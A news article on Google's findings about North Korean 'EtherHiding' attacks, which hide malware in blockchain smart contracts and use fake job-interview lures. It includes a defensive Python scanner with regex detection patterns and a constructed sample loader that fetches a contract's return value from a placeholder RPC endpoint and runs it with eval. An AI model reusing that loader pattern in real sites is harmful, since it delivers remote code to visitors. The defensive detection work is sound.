North Korean hackers have adopted a technique for deploying malware aimed at stealing cryptocurrencies and sensitive information by embedding malicious code in smart contracts on public blockchain networks, according to Google's Threat Intelligence Group.
The technique, called “EtherHiding,” was introduced in 2023 and, according to Google, is often used together with social engineering techniques, such as approaching victims with fake job offers and high-profile interviews, and redirecting users to malicious websites or links.
Hackers take control of a legitimate website via a loader script and embed JavaScript code in the site; that code retrieves a separate package of malicious code stored in a smart contract, designed to steal funds and data once the user interacts with the compromised website.
Simplified representation of how the “EtherHiding” hack works. Source: Google Cloud
The compromised website communicates with the blockchain network through a “read-only” call that doesn’t create a transaction on the ledger, allowing the threat actors to avoid detection and minimize transaction fees, according to Google researchers.
The report highlights the need for vigilance within the crypto community to protect users from the scams and hacks commonly used by threat actors seeking to steal funds and valuable information from individuals and organizations alike.
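Because the payload is fetched with a read-only call, nothing appears on-chain for transaction monitoring to catch; the detectable artefact is the loader script sitting in the compromised page. The following is an added example, not code from Google's report or from any product: a small static heuristic scanner that flags inline scripts which combine a read-only chain query (such as a JSON-RPC `eth_call`) with dynamic code execution (`eval`, `new Function`, injected script tags). The two page bodies are constructed samples; the RPC endpoint and contract address in the suspicious sample are placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample pages (not real captured content).
BENIGN_PAGE = """<html><head><script src="/static/app.js"></script></head>
<body><script>document.getElementById('x').textContent = 'hello';</script></body></html>"""

SUSPICIOUS_PAGE = """<html><body>
<script>
(async () => {
  const rpc = "https://rpc.example.invalid";  // placeholder endpoint
  const body = {jsonrpc:"2.0", id:1, method:"eth_call",
                params:[{to:"0x0000000000000000000000000000000000000000", data:"0x"}, "latest"]};
  const r = await fetch(rpc, {method:"POST", body: JSON.stringify(body)});
  const j = await r.json();
  eval(atob(j.result));   // decode the contract's return value and run it
})();
</script></body></html>"""

# Inline <script> bodies only; external scripts would need to be fetched separately.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Heuristic indicator families. None is malicious on its own; the combination
# of a read-only chain query with dynamic execution is what we flag.
INDICATORS = {
    # Read-only chain queries: raw JSON-RPC methods or web3.js-style .call()
    "chain_read": re.compile(
        r"eth_call|eth_getStorageAt|callStatic|\.methods\.\w+\([^)]*\)\.call\s*\(", re.I),
    # Presence of a web3 stack or JSON-RPC framing in page script
    "web3_lib": re.compile(r"\bethers\b|\bweb3\b|jsonrpc|ethereum\.request", re.I),
    # Turning fetched data into running code
    "dynamic_exec": re.compile(
        r"""\beval\s*\(|new\s+Function\s*\(|document\.write\s*\(|createElement\s*\(\s*['"]script['"]""",
        re.I),
    # Typical decoding steps before execution
    "decode": re.compile(r"\batob\s*\(|fromCharCode|hexToUtf8|toUtf8String", re.I),
}


@dataclass
class Finding:
    script_index: int   # position of the inline <script> within the page
    matched: list       # indicator families that fired in that script


def scan_html(html):
    """Return (suspicious, findings) for one HTML document.

    A script is marked suspicious when it both queries the chain read-only and
    executes dynamically built code; every script with any hit is reported so an
    analyst can review near-misses too.
    """
    findings = []
    suspicious = False
    for i, body in enumerate(SCRIPT_RE.findall(html)):
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if hits:
            findings.append(Finding(i, hits))
        if "chain_read" in hits and "dynamic_exec" in hits:
            suspicious = True
    return suspicious, findings


if __name__ == "__main__":
    for label, page in (("benign", BENIGN_PAGE), ("suspicious", SUSPICIOUS_PAGE)):
        verdict, found = scan_html(page)
        print(f"{label}: suspicious={verdict}")
        for f in found:
            print(f"  script #{f.script_index}: {', '.join(f.matched)}")
```

Run it over the HTML your crawler or proxy already captures for sites you own; a hit on `chain_read` plus `dynamic_exec` is rare in legitimate pages and worth an analyst's look. The check is deliberately simple and will miss obfuscated loaders, so treat it as a triage signal alongside file-integrity monitoring of the site's own JavaScript, which catches the injection step itself.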
Know the Signs: North Korea's Social Engineering Campaign Decrypted
According to Google, the threat actors set up fake companies, recruiting agencies, and profiles to target software and cryptocurrency developers with fake job offers.
After the initial pitch, the attackers move communication to messaging platforms such as Discord or Telegram and instruct the victim to take an aptitude test or complete a programming task.
“The core of the attack occurs during a technical assessment phase,” Google Threat Intelligence said. At this stage, the victim is often told to download malicious files from online code repositories such as GitHub, where the malicious payload is stored.
In other cases, the attackers lure the victim into a video call during which the user is shown a fake error message asking them to download a patch to fix the error. This software patch also contains malicious code.
Once the malware is installed on a computer, a second-stage JavaScript-based malware called “JADESNOW” is deployed to steal sensitive data.
A third tier is typically used for high-value targets and gives attackers long-term access to the compromised computer and other systems connected to its network, Google warned.
